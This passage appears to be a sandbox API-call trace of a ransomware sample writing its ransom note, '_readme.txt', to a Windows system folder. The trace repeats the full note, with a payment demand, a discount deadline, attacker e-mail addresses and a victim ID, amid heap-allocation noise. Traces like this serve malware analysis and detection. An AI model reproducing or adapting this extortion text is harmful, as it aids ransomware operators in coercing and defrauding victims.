unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6s", lpString2="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6sx9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6sx9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9" [0056.292] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5e2e0 [0056.292] CreateFileW (lpFileName="C:\\Boot\\pt-BR\\_readme.txt" (normalized: "c:\\boot\\pt-br\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5c8 [0056.293] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8c0) returned 0x3268798 [0056.293] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x85d) returned 0x32acff0 [0056.293] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6sx9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9", cchWideChar=-1, lpMultiByteStr=0x32acff0, cbMultiByte=2141, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6sx9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9", lpUsedDefaultChar=0x0) returned 1118 [0056.293] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x326aa18 [0056.293] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32acff0 | out: hHeap=0x660000) returned 1 [0056.293] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0056.293] lstrlenA (lpString="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6sx9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9") returned 1117 [0056.293] WriteFile (in: hFile=0x5c8, lpBuffer=0x326aa18*, nNumberOfBytesToWrite=0x45d, lpNumberOfBytesWritten=0x9f4fb64, lpOverlapped=0x0 | out: lpBuffer=0x326aa18*, lpNumberOfBytesWritten=0x9f4fb64*=0x45d, lpOverlapped=0x0) returned 1 [0056.294] CloseHandle (hObject=0x5c8) returned 1 [0056.294] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326aa18 | out: hHeap=0x660000) returned 1 [0056.294] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5e2e0 | out: hHeap=0x660000) returned 1 [0056.294] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c82710 | out: hHeap=0x660000) returned 1 [0056.294] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.294] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.294] FindFirstFileW (in: lpFileName="C:\\Boot\\pt-BR\\*", lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1ec2a390, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ec2a390, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x68d798 [0056.294] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.294] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1ec2a390, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ec2a390, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0056.294] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe83b9c0f, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16040, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0056.294] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ec2a390, ftCreationTime.dwHighDateTime=0x1d5956a, ftLastAccessTime.dwLowDateTime=0x1ec2a390, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ec2a390, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x45d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0056.294] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ec2a390, ftCreationTime.dwHighDateTime=0x1d5956a, ftLastAccessTime.dwLowDateTime=0x1ec2a390, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ec2a390, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x45d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0056.294] FindClose (in: hFindFile=0x68d798 | out: hFindFile=0x68d798) returned 1 [0056.294] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.295] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eef0 | out: hHeap=0x660000) returned 1 [0056.295] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eef0 [0056.295] PeekMessageW (in: lpMsg=0x9f4fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4fb74) returned 0 [0056.295] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.295] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.295] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.295] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.295] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.295] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.295] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.295] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.295] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.295] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.295] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.295] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.295] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.295] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.295] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.295] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.295] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.295] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.295] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.295] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.295] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.295] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5da58 [0056.295] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.295] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.295] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.295] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.295] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc2e) returned 0x322cda8 [0056.295] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.295] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x322cda8 | out: hHeap=0x660000) returned 1 [0056.296] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.296] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.296] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.296] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.296] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.296] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.296] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5da58 [0056.296] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.296] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.296] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.296] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0056.296] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0056.296] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.296] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.296] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0056.296] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0056.296] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.296] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.296] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.296] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.296] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.296] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.296] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.296] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.296] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.296] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.296] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5da58 [0056.296] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.296] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.296] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.296] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5da58 [0056.296] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.296] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.297] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.297] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.297] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.297] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.297] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.297] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.297] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.297] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.297] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.297] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.297] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.297] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.297] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.297] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.297] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.297] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.297] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.297] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.297] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.297] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.297] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.297] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.297] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.297] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.297] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.297] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.297] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.297] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.297] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.297] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.297] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x322cda8 [0056.297] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.297] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x322cda8 | out: hHeap=0x660000) returned 1 [0056.298] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.298] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.298] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.298] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.298] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.298] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.298] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.298] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc2e) returned 0x322cda8 [0056.298] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.298] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x322cda8 | out: hHeap=0x660000) returned 1 [0056.298] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.298] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.298] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0056.298] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0056.298] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.298] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.298] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0056.298] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0056.298] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.298] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.298] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.298] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.298] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.298] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.298] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.298] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.298] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.298] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.298] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.298] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x322cda8 [0056.298] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.298] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x322cda8 | out: hHeap=0x660000) returned 1 [0056.298] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.298] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.298] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5da58 [0056.299] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.299] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.299] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.299] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5da58 [0056.299] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.299] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.299] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.299] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.299] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.299] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.299] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.299] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.299] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.299] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.299] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.299] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.299] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.299] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.299] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.299] RtlAllocateHeap 